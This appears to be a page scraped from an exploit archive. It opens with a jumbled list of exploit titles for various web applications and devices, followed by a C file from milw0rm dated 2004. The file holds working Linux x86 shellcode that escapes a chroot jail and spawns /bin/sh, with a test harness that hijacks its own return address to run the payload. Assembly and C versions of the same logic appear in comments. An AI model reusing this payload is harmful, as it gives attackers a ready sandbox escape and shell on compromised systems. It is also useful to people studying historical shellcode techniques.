477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
74 lines
No EOL
3.2 KiB
C
Executable file
74 lines
No EOL
3.2 KiB
C
Executable file
/* This is Linux chroot()/execve() code.It is 80 bytes long.I have some *
|
|
* ideas how to make it smaller, but till then use this one. *
|
|
* signed predator *
|
|
* linux registered user : 181116 *
|
|
* preedator(at)sendmail(dot)ru *
|
|
***************************************************************************/
|
|
|
|
char sc[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x36\x5e\x88\x46\x0a"
|
|
"\x8d\x5e\x05\xb1\xed\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x83"
|
|
"\xc3\x02\xb0\x0c\xcd\x80\xe0\xfa\xb0\x3d\xcd\x80\x89\x76\x08\x31"
|
|
"\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x89\xc2\xb0\x0b"
|
|
"\xcd\x80\xe8\xc5\xff\xff\xff/bin/sh..";
|
|
|
|
int main(){
|
|
int *ret=(int *)(&ret+2);
|
|
printf("len : %d\n",strlen(sc));
|
|
*ret=(int)sc;
|
|
}
|
|
|
|
|
|
// Asm code
|
|
/*********************************************
|
|
*int main(){ *
|
|
* __asm__(" xorl %eax,%eax \n" *
|
|
* " xorl %ebx,%ebx \n" *
|
|
* " xorl %ecx,%ecx \n" *
|
|
* " movb $0x17,%al \n" *
|
|
* " int $0x80 \n" *
|
|
* " jmp 0x36 \n" *
|
|
* " popl %esi \n" *
|
|
* " movb %al,0xa(%esi) \n" *
|
|
* " leal 0x5(%esi),%ebx \n" *
|
|
* " movb $0xed,%cl \n" *
|
|
* " movb $0x27,%al \n" *
|
|
* " int $0x80 \n" *
|
|
* " xorl %eax,%eax \n" *
|
|
* " movb $0x3d,%al \n" *
|
|
* " int $0x80 \n" *
|
|
* " addl $0x2,%ebx \n" *
|
|
* " movb $0xc,%al \n" *
|
|
* " int $0x80 \n" *
|
|
* " loopne -0x06 \n" *
|
|
* " movb $0x3d,%al \n" *
|
|
* " int $0x80 \n" *
|
|
* " movl %esi,0x8(%esi) \n" *
|
|
* " xorl %eax,%eax \n" *
|
|
* " movb %al,0x7(%esi) \n" *
|
|
* " movl %eax,0xc(%esi) \n" *
|
|
* " movl %esi,%ebx \n" *
|
|
* " leal 0x8(%esi),%ecx \n" *
|
|
* " movl %eax,%edx \n" *
|
|
* " movb $0xb,%al \n" *
|
|
* " int $0x80 \n" *
|
|
* " call -0x3b \n" *
|
|
* " .string \"/bin/sh..\" \n"); *
|
|
*} *
|
|
*********************************************/
|
|
|
|
//C code
|
|
/**********************************************
|
|
*int main(){ *
|
|
* char *sh[2]={"/bin/sh",NULL}; *
|
|
* int gg=0xed *
|
|
* mkdir("sh..",gg); *
|
|
* chroot("sh.."); *
|
|
* while (gg!=0){ *
|
|
* chdir("..");gg--; *
|
|
* } *
|
|
* chroot(".."); *
|
|
* execve(sh[0],sh,NULL); *
|
|
*} *
|
|
***********************************************/
|
|
|
|
// milw0rm.com [2004-09-12]
|